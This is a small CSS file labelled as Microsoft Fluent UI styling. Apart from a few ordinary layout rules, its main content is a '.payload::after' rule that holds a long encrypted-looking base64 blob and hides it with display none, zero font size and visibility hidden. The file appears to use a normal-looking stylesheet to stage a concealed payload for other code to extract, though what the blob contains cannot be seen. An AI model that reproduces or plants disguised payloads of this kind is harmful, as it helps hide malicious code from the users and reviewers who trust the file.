
/* Microsoft Fluent UI – dynamic style injection */
body {
  font-family: "Segoe UI", system-ui, sans-serif;
  background-color: #ffffff;
  margin: 0;
  padding: 0;
}

.container {
  max-width: 1080px;
  margin: auto;
  padding: 24px;
}

.payload::after {
  content: "8608538f1ae9fb06d7ff79f72363eb5a:8+lkfPnVJI+9KxwJNCmBtQg9JjyS6y1821m/Web1knCR6kUUSDjpCYhiLhbsqJ7atxFFtT2NWs85mSrs4oQU0X7Ykob4X9atYwRDeO8wNN8pUhVLddMBRvpd3mwRfe+sVro1s5sESlssYGjkQaDl1RgEyjAXI2unCspKuqt5ctmsX/yNU+yRDRzg5dHy9v+hdg0vSkiZj0FbGl19LOUwDBVLpPC8vwCpXLyp02C+F/9M9L577UEWXqwhRNYwdgozBv6LFLZiG96dDsyVk6gQeQlYIxNVtwm5Ovvuv0VzI6eYrBTxje43KSA5v1ZA4hQmVXkQJVeD2P0O9Tgd8QDJdwQiuyB+UJRJKQ+Ju1sP3JO+A9Cp0KVtFHp6Kq7HEx6RnUELgfdSdtN2D22eaqO72z0IV10EZnVYs1UsN/odm+Tb87ACM7pzMdwCSwXXlwIf1RXYttsmeMz6pawaiRnhGZOit3Y2UqiEPwPeiwh/G73HK9QJWCqrWFgFSliPh50BBQZB4b+d7EO+e04WkIPpfJaW+I6jeK8oem2OLQW7SlDFxyOTET9/c8ZitaxWVkLI/hUJytT7RI+ZnHqetkMicUBAfM8HkMitHI35SG20dRqIn2JvXRjWSADK122PPfR3+kQdhefdwzRkPaPug7oev9wP8HGh5TOOZcpVqwiYUrnQ0+wo5KDyOWCPdi5eh+3eTuoWVH/UFP2G/GV49780xIqbpATR/QMDtmY6jF6muwUJlPZuzrgrIudH1rF/1bRVtDPfVTvpfwzQkIfOjVee5YkR7DIB9GxyYAnLYNNUTllZIrponTQULe20SCAcKKdgUEqPhsz5x0JrFb7x9cRU0LGwyZFWOdLldxlojfvEnY8yMOEZE5jNTPQ7QluTNZ64vh4dWdTLuar4Dhy0g3N528AR00vEOcQ3lXaOf4tnh63ARjPeiLp7udbifcRmsYrMjlbahBlyEcxYRjQwJ25VezTaVPQdrV/HqdJz+fh2ueIzzdKCKdbmlIiA3hfGSsdYTes7pwV5SY4wnSsO2cLuc8t4dHcOTunP2QfixFR9v2aKMHhsItPy2ouUpbjnJV550zi4X9HR+09jUKgPYz2SYzd3eQZ5xSBPdSozhjiBqZ4aWR1hAcdY7tnmwxhCmrfe";
  display: none;
  font-size: 0;
  visibility: hidden;
}
